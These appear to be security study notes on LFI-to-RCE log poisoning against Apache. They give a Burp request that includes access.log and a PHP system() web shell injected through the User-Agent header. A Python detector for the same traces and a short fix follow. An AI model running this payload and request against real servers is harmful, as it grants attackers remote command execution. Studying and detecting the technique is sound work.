* Log poisoning is only possible if the log file can be read through the LFI.
Log poisoning is a common technique used to gain a reverse shell from an LFI vulnerability. To make it work, an attacker attempts to inject malicious input into the server.
We will inject some malicious PHP code into the server's log.
* Note: In order for that to happen, the directory should have read and execute permissions.
The log file is located at the following path: /var/log/apache2/access.log
Can you read the log (Yes/No)? Yes
Inject PHP code into the User-Agent
Burp Repeater
GET /lfi/lfi.php?page=/var/log/apache2/access.log&lfi=command
User-Agent: <?php system($_GET['lfi']); ?>
LFI cheat sheet
github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
LFI to RCE via controlled log file
Just append your PHP code into the log file by doing a request to the service (Apache, SSH..) and include the log file.
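Seen from the defender's side, both steps above leave traces in the same access log: the PHP tag in a logged header, and a request parameter that points back at a log file. The following is an added detection example, not part of the original notes; it assumes Apache's "combined" LogFormat, and the sample lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Apache "combined": ip ident user [time] "request" status size "referer" "user-agent"
QUOTED = r'"((?:[^"\\]|\\.)*)"'
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] ' + QUOTED + r' \d{3} \S+ '
                  + QUOTED + ' ' + QUOTED + r'$')
PHP_TAG = re.compile(r'<\?(?:php|=)', re.IGNORECASE)   # PHP open tag or short echo tag
LOG_PATH = re.compile(r'/var/log/', re.IGNORECASE)     # parameter value naming a log file

def classify(line):
    """Return (client_ip, reasons) for one log line, or None if it does not parse."""
    m = LINE.match(line)
    if not m:
        return None
    ip, request, referer, agent = m.groups()
    reasons = []
    # Poisoning step: PHP code written into a field that Apache logs verbatim.
    for name, value in (("request", request), ("referer", referer), ("user-agent", agent)):
        if PHP_TAG.search(value):
            reasons.append("php-tag-in-" + name)
    # Inclusion step: a query parameter whose decoded value points at a log path.
    parts = request.split(" ")
    if len(parts) >= 2:
        query = parts[1].partition("?")[2]
        for key, value in parse_qsl(query, keep_blank_values=True):  # percent-decodes
            if LOG_PATH.search(value):
                reasons.append("log-path-in-param:" + key)
    return ip, reasons

def scan(lines):
    """Return [(line_number, client_ip, reasons)] for every suspicious line."""
    hits = []
    for number, line in enumerate(lines, 1):
        result = classify(line)
        if result and result[1]:
            hits.append((number, result[0], result[1]))
    return hits

# Constructed sample log lines (not taken from a real server).
SAMPLE = """
203.0.113.7 - - [07/Jul/2020:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [07/Jul/2020:10:00:05 +0000] "GET /lfi/lfi.php HTTP/1.1" 200 512 "-" "<?php system($_GET['lfi']); ?>"
203.0.113.9 - - [07/Jul/2020:10:00:09 +0000] "GET /lfi/lfi.php?page=/var/log/apache2/access.log&lfi=command HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.4 - - [07/Jul/2020:10:02:00 +0000] "GET /lfi/lfi.php?page=%2Fvar%2Flog%2Fapache2%2Faccess.log HTTP/1.1" 200 2048 "-" "curl/7.68.0"
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE.strip().splitlines()):
        print(hit)
```

Detection only narrows the window; the fix is to restrict the `page` parameter to an allowlist of includable files and to keep the log directory unreadable by the web server user, which removes the precondition noted at the top.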